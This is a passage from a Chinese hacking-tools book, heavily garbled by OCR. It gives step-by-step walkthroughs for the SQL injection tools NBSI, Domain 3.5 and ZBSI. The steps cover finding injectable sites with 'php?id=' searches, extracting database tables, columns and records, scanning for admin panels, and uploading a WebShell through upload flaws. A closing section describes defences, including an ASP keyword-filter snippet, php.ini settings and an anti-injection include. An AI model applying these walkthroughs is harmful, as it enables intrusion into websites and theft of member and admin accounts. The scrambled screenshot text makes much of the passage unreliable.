NBSI (网 站 安全 漏洞 检测 工具 ， 又 叫 SQL 注入 分 析 器 )， 是 一 套 高 集成 性 Web 安全 检 
测 系统 ， 是 由 NB 联盟 编写 的 一 个 非常 强大 的 SQL 注入 工具 。 经 长 时 间 的 更 新 优化 , 在 ASP 
程序 漏洞 分 析 方 面 已 经 远 远 超越 同类 产品 。NBSI 分 为 个 人 版 和 商业 版 两 种 ， 个 人 版 只 能 检 
测 出 一 般 网 站 的 漏洞 ， 而 商业 版 的 分 析 范 围 和 准确 率 都 有 所 提升 。 
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< 7 章 


注入 工具 


利用 网 站 程序 漏洞 结合 注入 利器 NBSTL， 置 客 可 以 获取 会 员 账 号 和 宣 吾 负 账 号， 从 
而 可 以 获取 整个 网 站 的 WebShell， 然 后 通 过 开启 Telnet 和 3389 端口 来 攻击 该 网 站 服 
务 髓 。 


7.3.2 使 用 NBNM 注入 曝光 


在 NBSI 中 可 以 检测 出 网 站 中 存在 的 注入 漏洞 ， 再 对 其 进行 注入 工具 。 下 面 将 曝光 其 
具体 的 实现 步骤 。 


STEP01: 下 载 并 运行 NBSI 3.0 STEP02: 打开 “网 站 扫描 ” 窗 


i ) | - or) 的 Th | 
隔 F 名 | 
FE 


揪 量 册 覃 


话 六 请 得: 


cm 7 | raalayt 站 Sem | lupaat | Beth | Baiah 
虹 永 曾 Wp 平 去 荣 狼 Es 斑 于 放电 看 上 寺 师 侍 前 


输入 注入 点 的 URL， 否 则 将 输入 要 入 侵 的 网 站 地 址 ， 选 择 “ 快 速 扫描 ” 单 选 按 
需要 对 入 侵 网 站 进行 扫描 。 扫描 ”按钮 。 钮 ， 单 击 “ 扫 描 ” 按 钮 即 可 对 该 网 站 进行 扫描 。 
STEP03: 在 扫描 过 程 中 发 现 注入 漏洞 STEP04: 单 击 要 注入 的 网 址 


sl 了 -而 Hiek26 地 阴 版 ” 平 加 和 人 司 阐 J 而 Hack 生 20 专 于 栈 下 而 针 4 


天 要 : 著 : 了 陈 :要 2 入 入 总 - 半 - 5 于 3 时 所 @ 二 | 


F 觅 于 月 局 主 画 局 【OH 辣 款 地 比 -| 和 时 本 建 归 硬 斑 全 面 | 本。 归 量 | 


福 入 贡 刁 | 


漏洞 地 址 及 注入 性 的 高 低 显示 在 “扫描 结果 ” 列 单 击 要 注入 的 网 址 ， 即 可 将 其 圈 单 击 “ 注 入 
表 中 。 添加 到 “注入 地 址 ”文本 框 中 。 ”分 析 ” 按 钮 。 
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合 人 他 他 


STEP05: 打开 “注入 分 析 ” 窗 口 STEP06: 进行 检测 


时 


久久 |.0.| 4 


评 久 网 址 : 上 Fr 1 rl 


选择 “Post” 单 选 按 钮 ， 在 “特征 字符 ”文本 框 中 单 击 “ 犹 解 表 名 ”按钮 。 
输入 相应 的 特征 符 ， 单 击 “ 检 测 ” 按 钮 。 


待 检 测 完 毕 ， 如 果 “ 未 检测 到 注入 漏洞 ” 单 选 按 钮 被 选中 ， 则 该 网 址 


提示 是 不 能 被 用 来 进 井 行 注入 攻击 的 。 
STEP07: 打开 “SI 提示 信息 ”对 话 框 STEP08: ls Se 


ST 了 .而 日生 2 专用 本 


SI 提示 信息 a = © @ .© 了 本 总 意 入 3 


中 | 数据 库 浴 型 为 CCESS ,系统 将 启用 字典 档 Dict_Field Txt 进行 猜 角 证 闻 二 [rae 
~ 如 果 字 奥 文件 比较 大 ， 会 花 虽 较 长 的 时 间 ， 您 确认 进行 猜 解 ? Ra 


丙 间 于 攻 | 师 年 种 芭 | 慰 天 | 。 随 利 到 者 ， 则 库 | 二 二 | | i 
b= Is |]| 


单 击 “ 确 定 ”按钮 。 待 猜 解 完毕 ， 将 会 在 “已 猜 解 表 名 ”文本 框 中 显示 
数据 库 的 表 名 。 


这 里 得 到 的 是 一 个 数字 型 +Access 数据 库 的 注入 点 ，ASP+ MSSQL 型 
提示 的 注入 方法 与 其 一 样 ， 都 可 以 在 注入 成 功 之 后 读 取 数据 库 的 信息 。 


STEP09: 选中 要 猜 解 的 数据 表 STEP10: 勾 选 要 猜 解 列 名 前 面 的 复 选 杠 


,BESI 夫 周 配 ”不 要 灶 情 同 国 站 TSI 于 .而 Hack25 专 必须 ”水村 站 侍 


息 轧 .608 名 多 壮 or 香 外 这 | 


sy re Eb 向 证 e 直 这 证 只 1 址 -|hsp /= Com pt ph i pat Sit red az? 


汪 攻 二 时 

下 HTTP 宕 此 下 区 寺 村 石 器 字 卉 i HTPPIR 各 各 和 5 拉 过 对策 本 划 
六 | 六 
让 access 有 世 二 本 大 


书面 时 表 耕 ， sw*t 叶 | 库 


bal 
be 让 
ot 门 


四 Tas Pin thurs | Sebekadl | Bega | Gawd | Frashatl 
于 于 看 也 区 十 下 


单 击 “ 猜 解 列 名 ”按钮 ， 即 可 得 到 该 数据 表 所 包含 ” 单 击 “ 猜 解 记录 ”按钮 ， 名 可 得 到 该 列 名 中 包含 的 
列 的 相关 信息 。 评 细 信息 。 
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STEP11: 返回 “NBSI” 主 窗口 STEP12: 进入 “扫描 及 工具 ”窗口 


= 而 BSI 于 - 而 而 二 让 于 3 站 老 男 本 天 醒 外 性 -SI 了 .在 asEgzE 二 周 藉 二 面 村 性 


辣 时 3 蝎 3 ,是 ， 嫩 昌 二 aall 所 证 记 基 。。 悍 订户 是 刘 
天 ns 用 ee See 


1 | Ep tt i ee 


el Ed i al 
pet i i i ie ie ric ee i lee._ Erie tr 
E i 和 Win ie | 


重 
ii 


FT 
[ 


‖ 请 同村 页 启 辣 主 归 | 


单 击 “ 扫 描 及 工具 ”按钮 。 将 标识 为 “可 能 性 : 较 高 ”的 网 址 复制 到 “扫描 地 
址 ”文本 框 中 , 勾 选 “由 根 目录 开始 扫描 ” 复 选 框 ， 
单 击 “开始 扫描 ”按钮 ， 可 将 可 能 存在 的 管理 后 台 
扫描 出 来 ， 并 且 显 示 在 “可 能 存在 的 管理 后 台 ” 列 
表 框 中 。 


7.4 Domain 注入 曝光 


目前 使 用 最 广泛 的 三 球 注 入 攻击 工具 分 别 是 Domain 3.5 劳 注 工具 、“ 啊 D”SQL 注入 
工具 和 NBSI。 这 些 工 具 大 大 简化 了 网 页 注入 操作 的 难度 ， 使 用 Domain 3.5 劳 注 工具 同样 
可 以 轻松 检测 出 网 站 的 数据 库 、 表 、 了 字段 的 内 容 ， 甚 至 得 到 网 站 的 管理 权限 。 


7.4:1 Domain 功能 概述 


劳 注 WEB 综合 检测 程序 (Domain) 是 一 天 功能 非常 强大 的 SQL 注入 工具 。 访 工具 具有 
WHOIS 查询 、 上 传 页 面 批量 检测 、Shell 上 传 、 数 据 库 浏览 及 加 密 解 密 等 功能 。 利 用 该 工具 可 
以 进行 劳 注 检测 、 综 合 上 传 、SQL 注入 检测 、 数 据 库 管 理 等 操作 ， 而 虚拟 主机 域名 查询 、 二 级 
域名 查询 、 整 合 读 取 、 修 改 Cookies 功能 比较 适合 初级 用 户 。 

Domain 工具 主要 包括 宠 注 检测 、 综 合 上 传 、SQL 注入 检测 、 数 据 库 管理 、 破 解 工 具 以 
及 辅助 工具 6 个 模块 ， 每 个 模块 都 有 许多 小 功能 。 另 外 ， 访 工具 中 的 每 个 检测 功能 都 采用 
多 线程 技术 。Domain 工具 中 各 个 模块 的 具体 作用 如 下 。 

1) 劳 注 检测 模块 : 访 模 块 包括 虚拟 主机 域名 得 询 、 二 级 域名 个 询 、 整 站 目录 扫 摘 、 网 
站 批量 扫 摘 、 上 自动 检测 网 站 排名 、 目 动 谈 取 \ 修 改 Cookies、 目 动 检 测 注入 点 等 多 种 子 功能 ， 
而 且 最 新 版 本 对 该 模块 大 部 分 功能 已 做 了 优化 。 

2) 综合 上 传 模 块 ， 综合 上 传 模块 包括 动 网 上 传 漏洞 、 动 力 上 传 漏洞 、 动 感 购物 商城 、 
乔 客 上 传 漏洞 和 目 定 义 上 传 等 功能 。 

3) SQL 注入 检测 模块 : SQL 注入 检测 模块 可 以 对 一 个 或 多 个 网 站 进行 批量 扫描 注入 
点 、SQL 注入 猜 解 检测 、MSSQL 辅助 工具 、 管 理 入 口 扫 描 、 检 测 设置 区 等 操作 。 其 中 批 
量 扫描 注入 点 可 以 对 一 个 或 多 个 网 址 进行 检测 。SQL 注入 检测 模块 虽然 新 增 功 能 不 太 多 ， 
但 是 在 新 毅 和 速度 上 有 所 突破 。 

4) 数据 库 管 理 模块 :在 Domain 工具 中 还 可 以 对 已 经 存在 的 各 种 数据 库 进行 管理 ， 如 
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NTZI Pe > 


工具 全 攻略 


信人 人 

新 建 和 浏览 数据 库 、 新 建 表 及 字段 、 压 纵 数 据 库 、 修 改 数据 库 密 码 、 奏 询 记 录 、 复 制 数据 
库 、 增 加 及 删除 记录 等 。 

5 ) 人 破解 工具 : 利用 Domain 中 日 之 的 破解 工具 可 以 破解 出 MD5 密 文 和 Serv-U 密码 等 ， 
还 可 以 破解 出 Access 数据 库 窒 码 和 Pcanywhere 黎 但 。 

6) 辅助 工具 : 在 Domain 中 自 带 的 辅助 工具 包括 BBSXP 最 新 利用 程序 、BBSXP 暴 库 
工具 、PHPwind2. 利 用 程序 、OfStar 论坛 利用 程序 、L-blog 漏洞 利用 程序 及 PHPBB 论坛 录 
用 程序 等 。 利 用 这 些 工 具 ， 可 以 攻击 相应 的 网 站 。 


7.4.2 ”使 用 Domain 注入 曝光 
使 用 Domain 实现 注入 的 具体 操作 步骤 如 下 。 


STEP01: Doman A 


团 T 坷 这 六 “ 导 ] 古 呈 库 付 枉 “Fa 后 相 工 具 [四 情 助 工具 “多 关 于 程序 re Ee 辆 将 总 上 靖 “ 及 0 广 A 团 硬 证 上 “出 下 坚 亩 普 理 “加 破解 工 “和 遍 精 朋 工 具 “内 关于 蛋 序 
TL 辆 点 由 客 : we. ap com | 人 1 CE 上 站 击 一 | 一 刷 灿 | 一 晶 进 一 [是 昌 一 | 


当前 融 乓 : hath 而 本 OIL em -一 | 
下 Lt be_ I= 0S ralest i 0 LHITET _ THER: ATSESSEORTLTESSEE 部 冯 | 


ee 和 苦 有 姑 点 二 当前 项 面 :1 项 。 本 页 时 条 : 4 - 占 。 网 站 排 攻 :We Beta 规 冰 :生产 所 属 醒 高 圳 | 
= 


语 宣 中 属 | 电子 调 忻 | 牙 料 下 载 | 基干 过 加 | 咀 条 3 
图 书 亚 确 i 雪 国 宁 必 ‖ 立 半 有 | 天 放荡 吉 | 站 攻 


村 起 点 工作 衬 


窗 ti 上 
区 (二 条 {real | 
5 窗 t | 


el 和 汐 后 暴 浊 最 增 本山 同 各 具 


于 午 : 加 机 化 天 着， 杯 酌 库 。 
在 百 ， 天 Higi 上 三 本 码 计 


团 输 和 域名 , 单 国 单 击 “ 查 国 查看 域名 对 应 选择 列表 中 的 任意 一 个 网 
击 区 河 按 钮 。 。 询 ”按钮 。 的 6 个 相关 站 点 。 址 , 单 击 “ 网 页 浏览 ”按钮 。 发 现 的 注入 点 。 
STEP03: 二 级 检测 副本 网 站 术 卫 检 济 


EEC TIREETTTTT ET 本 放 连 术 王 “证 省 上 情 ”局 5 还 六 国王 这 人 Te 加 而 利 工 具 EE 陨 关 于 蛋 序 


肪 处 固 名 |r. enet]. om "EDD [要 击 || 聘 遇 || 加 二 || 后 通 | 及 入 县 名， re ip! em al) tT 2 ts 三亚 呆 || 一 本 | 痊 进 | 启 通 
荐 前台 相 : ip: 0 疙 二， | 克拉 | ET EFT 证 接 
[1 三峰 疗 -| 而 下- tt be LM. alet Es l=0 Le TT TO MIErSINLESE 站 上面 
FE] | 一 一 有 日 当前 页 面 :1 页 本 亲本 可 | = 币 FHS EE Bus = 标 姑 名 中 oo oe 站 有 小 点 : 当前 要 区 :i 页 地 页 星 蝇 : 1 -证 。 网 小 竺 名 :BW Batis 查询 二 星城 名 中 . .， 


Ew, Td 
Fy bere ce 

ie dd 
| mr ehhpay en [3 


hp TE Sn oo 
二 


btn ee. iF ca 


存在 钠 击 : 【看 击 亲 开 ) 


单 击 “二 级 国 输 和 域 国 单 击 " 网 站 批 轩 查看 待 检测 的 几 
检测 " 按钮 。 。 名 和 网 址 。 量 检测 ”按钮 。 ”个 网 址 。 定 网 址 ”按钮 。 
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STEP05: 添 加 网 址 STEP06: 返回 2 a 


加 | 谋 宫 上 析 网 吕 a 入 入 Ep -一 一 -一 一 TT DT 
| | ry, TL, 2 | 查 别 | | 加 4 国 | 丁 -| | 
当 靖 喇 生 : btip we ratenl, cea 王 看 报 一 


人 itut_ be_ L001=1360001181 L205: yatet_an_i2061L=0L_LS0MIT3T_TEIESSEN MISESSIIITGSE 央 旺 呈 避 
FE RN 生机 下面 下 不 是 条 i- 站 Ps: Bs Bus 局 部 相 于 老 妾 | 


www.baduy.com 


| rr pe es ep ti J 
| hi fr ns [TE 5 者 下 
hha lnk Sh dee is = 
it im 1 国 op 


Le ETE i a 二 [oils [和 
re mt i Mt orls 
wa, hdd rn Li 


i rw ila. 
Th el 有 a 
i ba com dvb bi ep Eile 
“kil rd a fs ep 


雷 早 : 右 击 可 向 瑚 同 星 /上 侍 让 到 1 


输入 要 添加 的 网 址 。 ”区 OK" 按钮 。 国 单 击 “开始 国 查看 该 网 站 中 国 单 击 “ 保 存 
检测 ”按钮 。 所 包含 的 页 面 。 ”结果 ”按钮 。 


STEP07: 选择 保存 位 置 STEP08: 功能 设置 


正本。 mE: 


注 EE TT 本 二 二 ETITIOTTTTIECTTTTS 二 
县 人 是 站 Ra com 攻 33 1 | 本 二 | 届 || 而 起 | 后 昌 
荔 醒 娩 民 :bts tl. cea | 误 纺 


EL yet be_ L811=1000LI 0 yor L110_ 161TT_ THEA MSFSESSIOETICSS | 村 ol 
上 当 而 到 面 :1 下 可 机 星 天 1 = 各 网 站 排外 :Be Beta 


辐 | 河 入 阿 页 对 临 副 网 站 师 吉 
EF RT ie 
回 兽 浊 只 亲 主 视 后 , 自动 肯 入 和 网 六 由 量 鉴 利 | 


Fies of per | TxT 立 种 Ft 


输入 想 要 保存 的 名 称 。 国 单 击 "Save" 按钮 。 国 单 击 “ 功 能 对 浏览 网 页 时 的 个 
设置 ”按钮 。 别 选项 进行 设置 。 
STEP09: ”SQL 注入 


- 国 单 击 “ 批 量 扫描 注入 点 ”按钮 。 


| Ba dr. DT. tm 
| Bhi: A bE 


I 单 击 “ 载 入 查询 网 址 ”按钮 ， 在 左 侧 窗 格 中 查 
ta Tf ET 和 | . 看 关联 的 网 站 地 址 。 


囊 
lua- er. ree). Ci 证 证 
htap- i rr. ep. 
htnp- J ier. 本 于 和 人. < 
bitis dr Sala. < pF 


ee 


再 选中 与 前 面 设置 相同 的 网 站 地 址 之 后 ， 单 击 
右 侧 的 “批量 分 析 注 入 点 ”按钮 ， 可 在 “注入 点 ” 
列表 中 查看 检测 到 并 可 注入 的 所 有 注入 点 。 


: 


ed 


习习 习习 习习 习习 
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> 


工具 全 攻略 


ST IF 一 一 


全 人 人 他 
STEP10: SQL 注入 猜 解 检测 


车 ET FT GT 国 册 NT 贞 商 二 所 工具 rm 
担 量 本 蒿 证 人 点 Te 督 要 小 日 扫 后 。。 将 曾 识 四 区 


Jr| Aim | | 


请 翘 块 天 哆 并 三 


| 二 
| 二 


一 一 一 PP | 站 wor [加 和 二 各 下 一 条 记录 


Oe 


+ “SQL 注 国 在 "注入 点 "地 址 栏 中 输入 
猜 解 检测 ”按钮 。 上 面 检测 到 的 任意 一 条 注入 点 。 


7.4.3 ”使 用 Domain 扫描 管理 后 台 


使 用 Domain 扫 摘 


STEP01: 打开 Domain 注入 工具 


Yer3. 6 正式 卫 0105- 7- 和 1 本 ) [加 天 动画 吧 出 章 = 是 水 于 ] a , 
时 | 列 略 主 曾 理 居城 时 工 具 县 工 具 “ 除 关于 程 床 “ 
该 顿 遥 功 德 疗 曲 


国 在 主 窗口 中 选择 
"SOL 注 入 "选项 卡 。 


扫描 ”按钮 。 


144 


管理 后 台 的 方法 很 简单 ， 


岗 单 击 “ 管 理 入 口 因 在 "注入 点 "地 址 栏 中 输入 


STEP11: 开始 检测 以 及 查看 检测 结果 


同 1 可 注入“ 加价 受 库 冰 理 加 地 工具 国情 名 工具 “ 取 关于 查 序 


申 钴 设 辕 区 | 请 发 块 咕 栈 放 诅 轩 


输 币 rg: [| 加 目 动 性 裔 下 一 对 记录 


现 则 可 以 三 X， 
3 


过 名 | 
i 


= 胃 单 击 ' 猜 解 表 国 在 "检测 信息 
“开始 检 ”名 ”“ 猜 解 列 名 ” ”中 查看 SQL 注入 猜 
测 " 按钮 。“ 猜 解 内 容 "按钮 。 解 的 所 有 信息 。 


又 如 下 。 


管理 入 口 扫描 


其 体 的 操作 步 
STEPO2: 


.et LE 
TL 中 站 五 ， 遇 
a ,站 因 mm 二 kh 


ei. Ei 
Ce Te be wand isn 
dl] , om i 


二 
Mt | as 


pad be lah be 
id | El, “lt 


再 打算 


秽 单 击 “ 扫 描 后 
台地 址 ”按钮 。 


扫描 到 的 注入 地 址 ， 并 根据 需 
要 选择 该 单 选 按钮 。 


和 


注入 工具 


STEP03: 设置 表 名 、 字 段 以 及 后 台地 址 


、 | 间 ] 要 党 库 督 再“ 国 碌 症 工 具 “局 崩 县 工具“ 唆 关 于 程序 
管理 六 日 要 贡 | 疙 各 记 和 区 | 


是 首 最 址 : 曾 证 


查看 “设置 表 名 ”“ 设 置 字段 " 和 “后 台地 址 ” 
三 个 列表 的 详细 内 容 。 


Pi 
识 半 


Pe 本 二 


,Ws, Ths 
于 本 画 本 ”本 ” 恒 ”于 : 
一 全 


让 本 和 下 和 下 下 


| 


5 
是 
a 
i 
wi 
wr 
本 
i 
wm 
i 
a 
| 
a 
十 由 
wi 
wi 
i 
wp 
wi 
Ea 


tts 


通过 单 击 “添加 ”按钮 和 “删除 ”按钮 ， 可 以 
请 取 渍 接 设 置 歧 个 直上 迹 军 溃 。 区 | 委 坚 接 进 行 注 入 点 村 测 | (名 定 瘟 吉 量 六 大 桂 册 蝇 往 币 理 厂 1 分 别 对 三 个 列表 的 内 容 进行 相应 操作 。 


刘 师 :请 功 苞 主要 本 权 个 站 点 中 各 在 way? 肌 id 的 这 撞 地 址 谋划 出 村 ,的 局 再 中行 失利 1 进 浊 前 丈量 本 上 自己 设 秆 ! 


Ebers sd 是 立 仲 思 开 | 下 这 启动 尾 自 动 淡 周 


[1 


7.4.4 ”使 用 Domain 上 传 Webshell 


使 用 Domain 上 传 WebShell 的 方法 很 简单 ， 具 体 的 操作 步骤 如 下 图 所 示 。 


选择 “综合 上 传 ”选项 卡 。 


根据 需要 选择 上 传 的 类 型 {这 里 选择 的 类 型 为 ， 


如 内 代 划 


Ei 和 ee 有 和 5 二 有 二 时 


动 网 上 传 漏洞 ) 。 


多 在 “基本 设置 ”中 填写 检测 出 的 任意 一 个 漏洞 
ri ei _EE 本 | 。 页 面 地 址 ， 选 择 “ 默 认 网 页 木马 ” 单 选 按钮 ， 在 
a = “文件 名 ”和 “Cookies” 文 本 框 中 输入 相应 内 容 ， 
[ER 单 击 “ 上 传 ”按钮 。 


在 “返回 信息 ”中 查看 需 上 传 的 WebShell 地 址 ， 
单 击 “ 打 开 " 按钮 , 即 可 根据 上 传 的 WebShell 地址 
打开 对 应 的 页 面 。 


由 于 PHP+MySQL 网 站 具有 安全 系数 较 高 、 访 问 速度 较 快 、 易 用 性 好 、 价 格 较 便 宜 等 
优点 ， 目 前 很 多 中 小 型 企 事 业 单 位 都 采用 这 种 模式 创建 网 站 ， 因 此 这 类 网 站 也 成 为 黑客 攻 
击 的 对 象 。 


7.5.1 ZB 功能 简介 


PHP 注入 攻击 是 目前 比较 流行 的 注入 攻击 方式 , 依 徘 其 强大 的 灵活 性 吸引 了 广大 圭 客 。 
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PE > 
全- 工具 全 攻略 


全 人 人 他 
PHP 注入 也 分 为 两 种 ， 即 手工 注入 和 使 用 工具 注入 。 
现在 可 用 于 PHP 注入 的 工具 很 多 , ZBSI 就 是 其 中 之 一 。 ZBSI 是 一 训 经 典 的 PHP 注入 
辅助 工具 ， 使 用 该 工具 可 以 检测 PHP 网 站 中 是 否 存在 注入 漏洞 以 及 字段 数目 ， 还 可 以 将 其 
作为 浏览 需 打 开 指定 的 网 页 。 


7.9.2 使 用 IB 实现 注入 攻击 上 坚 光 


由 于 目前 PHP 注入 漏洞 普 志 存在 , 并 且 存 在 很 多 “优秀 ”的 注入 工具 ,如 ZBSI 和 CASI]， 
这 让 黑客 避免 了 依靠 手工 进行 猜 解 ， 从 而 提高 了 用 户 被 入 侵 风 险 。 
使 用 ZBSI 检测 注入 点 的 具体 操作 步骤 如 下 。 


STEP01: 打开 百度 搜索 STEP02: 下 载 并 运行 ZBSI V1.0 


= = 加 夯 = 下 到 村 = 看 四 = 工 上 in 乔 - 可 本 呈 斩 了 呈 到 辆 加 


下 , 尖 向 击 神 面 酉 计 归 吉 冲 
re IE 
Fa a 和 


E 二 ci 
[本 ET 计 月 ele 促销 汐 因 遂 术 bh 名 于 卫 一 有 


以 “php? id=” 为 关键 字 搜 索 网 页 国 输入 搜索 到 的 网 址 ， 


单 击 “检测 注入 ”按钮 。 ”可 以 进行 PHP 注 入 。 
STEP03: 查看 猜 解 到 的 字段 STEP04: 查看 含有 猜 解 到 字段 的 网 址 


一 ea ra ro 
Ed 


pr EF ibs ph sb rE ar 
和 hs Et EX 
| pat 面 本 :她 mh 


:7 CP 


4 2 


单 击 “字段 数目 ”按钮 ， 可 看 到 猜 解 到 的 字段 数目 。 团 将 一 个 可 注入 的 网 ” 辆 单 击 “ 浏 览 ”按钮 ， 
址 复制 到 “网 站 地 址 ” ”可 看 到 含有 猜 解 字段 的 
文本 框 中 。 网 址 。 
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注入 工具 


STEP05: 查看 其 他 网 址 


PFA 站 =] 
|bap hh i eh er her ri Phe els es re Na 
a 帮 


| Fi 可 总 乔 辣 诊 - 

| 国 i te Er ipa iTLrL ed re hel 
| a tt 二 
ri ch CFE Tp "hal " Tt 


也 可 在 “网 站 地 址 ”文本 框 中 输入 要 浏览 的 网 页 地 
址 ， 单 击 “浏览 ” 按 钮 ， 浏 览 相 应 的 网 页 。 


本 性 二 四。 云 甬 之 学 时 用 三 国际 贡 在 机 心 排行 由 村 用 桂 


元 天 二 过 :hip hi bed comintpin 


在 各 种 黑客 横行 的 年 代 ， 如 何 实现 PHP 代码 安全 并 保证 程序 和 服务 器 的 安全 是 一 个 很 
重要 的 问题 。 在 编写 PHP 代码 时 ， 对 变量 进行 初始 化 和 过 小 可 以 有 效 防 御 PHP 注入 。 


7.6 SQL 注入 攻击 的 防范 


由 于 SQL 注入 攻击 具有 很 大 的 危害 性 ， 现 在 已 经 严重 影响 到 网 站 的 安全 。 在 防御 
SQL 注入 攻击 时 ， 网 站 程序 员 必 须要 注意 可 能 出 现 安全 漏 铜 的 地 方 ， 主要 是 用 户 输入 数 
据 的 页 面 。 

1. 对 用 户 输 入 的 数据 进行 过 滤 

目前 引起 SQL 注入 攻击 的 原因 是 程序 员 在 创建 网 站 时 对 特殊 字符 不 完全 过 滤 , 程序 员 
没有 足够 的 脚本 安全 意识 或 考虑 不 周 。 第 见 的 过 滤 方 法 有 基础 过 滤 与 二 次 过 滤 以 及 使 用 
SQL 通用 防 注 入 程序 过 滤 等 多 种 方式 。 

(1) 基础 过 滤 与 二 次 过 滤 

在 进行 SQL 注入 攻击 前 ， 需 要 在 可 修改 参数 中 提交 “ ’”“and” 等 特殊 字符 判断 是 否 存 
在 SQL 注入 漏洞 ;而 在 进行 SQL 注入 攻击 时 ， 需 要 提交 包含 “;”“--”“update”“select” 等 
特殊 字符 的 SQL 注入 语句 。 所 以 要 防 SQL 注入 攻击 ， 需 要 在 用 户 输 入 或 提交 变量 时 ， 对 
这 些 特殊 字符 进行 转换 或 过 小 ， 这 样 才 可 以 在 很 大 程度 上 避免 SQL 注入 漏洞 的 存在 。 

下 面 是 一 个 ID 变量 的 过 滤 性 语句 |: 


if instr(request ("id"),",")>0 or instr(request ("id"),"insert")>or instr (request 


(Td). "230 thern respDonse. weite” 
<SCRIPT language=javascript> 
javaScript:history.go (-1); 
</SCRIPT> 
response.end 


end if 


上 面 代码 的 作用 是 过 滤 ID 参数 中 的 “;”“,” 和 “insert” 字 人 符 。 如 果 在 ID 参数 中 包含 
这 几 个 字符 ， 则 会 返回 错误 页 面 。 但 危险 的 字符 远 不 止 这 儿 个 ， 如 果 要 过 滤 其 他 字符 ， 只 
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客 要 
PE IRSum 


全 全 全 
需 将 危害 学 符 加 a 到 上 和 面 的 代码 中 即 可 。 通 常情 况 下 ， 在 获得 用 户 提 交 的 参数 时 ， 首 先 要 进 
行 基础 性 的 过 滤 ， 然 后 再 根据 程序 相应 的 功能 以 及 用 户 输 入 的 数据 进行 二 次 过 滤 。 

(2) 在 PHP 中 对 参数 进行 过 滤 

与 ASP 注入 相 比 ，PHP 注入 的 难度 比较 大 ， 同 样 在 PHP 中 防御 SQL 注入 要 相对 容易 
一 些 。 可 以 利用 PHP 网 站 中 配置 文件 php.ini 来 对 PHP 站 点 进行 安全 设置 。 打 开 “php.ini” 
文件 的 安全 模式 ， 分 别 设 置 “safe_mode=On” 和 “display_errors=off”。 因 为 如 果 显 示 PHP 
执行 错误 信息 的 “display_errors” 属 性 是 On 的 话 ， 束 会 返回 很 多 信息 ， 这 样 黑 客 束 可 以 利 
用 这 些 信 息 进 行 攻击 。 

另外 ， 在 该 文件 中 还 有 一 个 重要 的 属性 “masic_quotes_gpc”， 如 果 将 其 设置 为 “On?” 
PHP 网 站 隋 会 目 动 将 提 区 含有 和 ”2 ” ”等 特殊 字符 的 数据 转换 为 含有 反 冬 线 的 转 义 宇 
人 条。 该 属 性 与 ASP 中 参数 的 过 滤 非 常 关 似 ， 它 可 以 防御 大 部 分 字符 型 注入 攻击 。 

(3) 使 用 SQL 通用 防 注入 程序 进行 过 滤 

通过 手工 的 方法 对 特殊 字符 进行 过 滤 难 免 会 留 下 漏洞 , 而 使 用 SQL 通用 防 注 入 程序 就 
可 以 对 程序 进行 全 面 过 滤 ， 从 而 避免 存在 SQL 脚本 注入 漏洞 。 将 下 载 的 “SQL 通用 防 注入 
程序 V3.2” 存 放 在 网 站 所 在 的 文件 夹 中 ， 然 后 进行 简单 的 设置 承 可 以 很 轻松 地 帮助 程序 员 
防御 SQL 注入 攻击 ， 这 是 一 种 比较 简单 的 过 小 方法 。 

该 工具 可 以 全 面 处 理 通过 POST 和 GET 两 种 方式 提交 的 SQL 注入 ， 并 且 可 以 自 
定义 需要 过 滤 的 字符 串 。 当 黑客 提交 SQL 注入 危险 信息 时 ， 它 就 会 自动 记录 其 IP 地 
址 、 提 交 数 据 、 非 法 操作 等 信息 。 使 用 SQL 通用 防 注 入 程序 进行 过 滤 的 有 具体 操作 步骤 
如 下 。 

将 下 载 的 SQL 通用 防 注入 程序 压缩 包 解 压 ， 即 可 看 到 该 工具 主要 包含 Neeao_SqlIn. 
Asp、Neeao_sql admin.asp 和 SqlIn.mdb 3 个 文件 。 


STEP01: “SQL 通用 防 注入 程序 ”所 包含 的 文件 


| 
ea = 

OU- 且 “ 本 地 磁盘 (F) ， 新 建文 件 夫 ，Fy_ SqlX-v3.0 。 ~ | 仔 || 状 雪 hshyx5 

文件 (Pi ”编辑 (E) ” 章 春 (V) ”工具 (T) “帮助 (H) 

组 织 ” ” 包 仿 到 库 中 ”新 建文 件 夫 =» 国 - ©@ 


名 称 修改 日 其 类 型 


说 明 立 件 
交 本 立 档 


= 1EKB 


将 其 复制 到 网 站 所 在 的 文件 夹 中 ， 在 需要 防 注入 的 页 面 尖 部 加 入 “<!--#include 
file="Neeao_SqlIn.Asp"-->” 人 代码， 保存 该 网 页 后 ， 即 可 使 关 洛 无 法 对 该 网 页 进行 注入 攻击 。 
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注入 工具 


STEP02: 在 网 页 代码 中 加 入 防 注 入 程序 


外 可” +0. a | aa » | EPEig -> 


文件 (也 ”编辑 (E) 查看 (WD 插入 (DD 修改 (如 格式 (中 命令 (中 ”站 点 (3) 窗口 多 大助 0 


。 de fi le= "可 Beal Tu hsp Dd > 超级 链接 
ee a i 936"%> 
& 局 电子 邮件 链接 


* 水 Restrict Access To Page: Grant or deny access to this page 、 
WO authorizedUsers="N" 命名 锚 记 
WO authFailedURL=" adminerror. asp” 三 水平线 
DL erantAccess=false 
If Session("M Username’) 《>“”Then 

If (false Or CStrtlSession("M UserAuthorization’ ))="") 0 

(InSstr tl, MM authorizedUsers, Sessiont" OL ta ee JJ 二 
Then 
WM_ eranthccess = true 

End If 
End If 
If Not WO _granthccess Then 

WD qsChar = “?" 

If (Instr tl, OD authFailedURL,“?") >= 1) Then WM qsChar = “&" 

Wreferrer = Request. ServerYariables ("URL") 

if (LentRequest.QueryStrine 人 it) > 0) Then WM_referrer = MW referrer & “?” 
& Request.QueryString () 

WD authFailedUFL = WO authFailedURL & WM qsChar & “accessdenied=”&& 
Server. URLEncode (WOM_referrer) 

Response. Redirect (WM_authFailedURL); 
End If 
%><IDOCTYPE html PUBLIC “~-//W3C/A/DID XHTIL 1.0 Transitional/ /EN 
“http: A wn, w3. ore/ TR/xhtmll/DID/xhtmll-transitional. dtd” > 
<html xmlns="http: /wny. w3,. org/ 1999/xhtml" > 网 FTP & RDS 服 ... 
<head> 回 点 面 项 目 
<meta http-equiv="Content-Type” content="text/html: charset=gb2312” /> 
《title》 后 台 管理 《title> 
<style type= "textycss "> 

| 二 二 
body, td,th { 

font-size: ldpx: 


如 果 要 想 使 整个 网 站 都 可 以 防 注入 ， 可 以 在 数据 库 连接 文件 ( 一般 为 
conn.asp ) 中 加 入 “<!-- 机 nclude file="Neeao_SqlIn.Asp"-->” 人 代码 ， 就 可 以 在 任 


所 不。 意 页 面 中 调用 防 注入 程序 ， 


2. 使 用 专业 的 漏洞 扫描 工具 进行 扫描 

